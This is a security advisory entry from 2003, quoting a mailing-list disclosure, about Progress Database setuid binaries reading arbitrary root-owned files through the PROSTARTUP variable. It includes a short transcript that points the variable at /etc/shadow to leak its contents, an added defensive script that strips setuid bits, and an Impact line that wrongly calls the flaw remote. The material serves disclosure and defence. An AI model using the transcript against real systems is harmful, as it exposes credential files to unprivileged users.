SecurityTracker.com
Category:   Application (Database)  >   Progress Database
Vendors:   Progress Software Corporation
Progress Database Configuration File Error Messages May Disclose Root-Owned Information to Local Users
SecurityTracker Alert ID:  1006457
SecurityTracker URL:  http://securitytracker.com/id/1006457
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 4 2003
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 7 - 9
Description:   An information disclosure vulnerability was reported in the Progress Database. A local user can view some root-owned information.

Secure Network Operations Strategic Reconnaissance Team reported that a local user can make the software read arbitrary files with root privileges and display portions of the file contents as part of an error message. A local user can reportedly specify a configuration file to be read (even if the file is not a configuration file), regardless of the privileges of the local user. The file to be read is set via an environment variable, such as the PROSTARTUP variable. If the file is not the appropriate configuration file, some of the contents will be displayed to the user, according to the report.

A demonstration exploit transcript is provided:

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)

bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

The vendor has reportedly been notified.

Impact:   A remote user can view portions of arbitrary root-owned files on the system.
Solution:   No solution was available at the time of this entry. The vendor is reportedly working on a fix.

The author of the report indicates that, as a workaround, you can remove the set user id (setuid) bit from all setuid binaries in the $DLC folder.
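
The workaround above as a repeatable procedure: list the set-id files under the Progress install directory, then strip the bits and verify. This is an added example, not part of the SecurityTracker entry or the original advisory; the function names are hypothetical, and DLC is assumed to hold the install path.

```shell
#!/bin/sh
# Added example (not from the advisory): audit and strip setuid/setgid
# bits under the Progress install directory. Function names are
# hypothetical; pass the directory ($DLC) as the first argument.

# list_suid DIR: print each regular file under DIR that is setuid or setgid.
list_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print
}

# count_suid DIR: number of set-id files under DIR.
count_suid() {
    list_suid "$1" | wc -l | tr -d ' '
}

# strip_suid DIR [apply]
#   Without "apply": dry run, only lists what would change.
#   With "apply":    runs chmod ug-s on each match, then re-checks.
# Returns 0 on success, 1 if set-id files remain, 2 on a bad directory.
strip_suid() {
    dir=$1
    mode=${2:-dry-run}
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }

    # Record owner and mode of every match first, so the change can be
    # reverted once a vendor fix is installed.
    find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec ls -ld {} +

    [ "$mode" = apply ] || return 0

    find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec chmod ug-s {} +

    # Verify: succeed only if nothing under DIR is still set-id.
    [ "$(count_suid "$dir")" -eq 0 ]
}

# Stand-alone use:  sh strip_suid.sh "$DLC"         (dry run)
#                   sh strip_suid.sh "$DLC" apply   (make the change)
if [ $# -gt 0 ]; then
    strip_suid "$@"
fi
```

Save the dry-run listing before applying the change; it is the record of which binaries were set-id and who owned them.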

Vendor URL:  www.progress.com/
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] SRT2003-04-02-1735 - Progress PROSTARTUP root owned file read


This data can be found at http://www.secnetops.biz/research

-KF




Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team	            research@secnetops.com
Team Lead Contact		                  kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number		: SRT2003-04-02-1735
Product			: Progress Database 
Version			: Versions 7 to 9 
Vendor			: progress.com
Class			: local
Criticality             : Medium to Low
Operating System(s)	: Linux, SunOS, SCO, TRU64, *nix


High Level Explanation
************************************************************************
High Level Description	: Error messages can provide root owned data
What to do		: chmod -s all suid binaries in /usr/dlc


Technical Details
************************************************************************
Proof Of Concept Status : No PoC is needed. 
Low Level Description	: 

The Progress Database reads configuration files as the root user. No
checks are made to verify that the user running the program has the 
permission to read the configuration file. A user can simply specify 
a root owned file and cause an error message to be generated to view 
the file contents. Most versions beyond v6 appear to be affected. 

An example variable that can be abused is the PROSTARTUP variable.

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)

bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER   : ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER   : ** Could not recognize argument: daemon:*::0:0. (301)

Luckily, on the machine I chose to exploit, the line that was read from the 
shadow file did not have an encrypted hash. This, however, is not always 
the case. 

Patch or Workaround	: chmod -s all suid binaries in the $DLC folder
Vendor Status	: vendor has been notified and is working on a fix
Bugtraq URL	: to be assigned 

------------------------------------------------------------------------
This advisory was released by Secure Network Operations, Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 

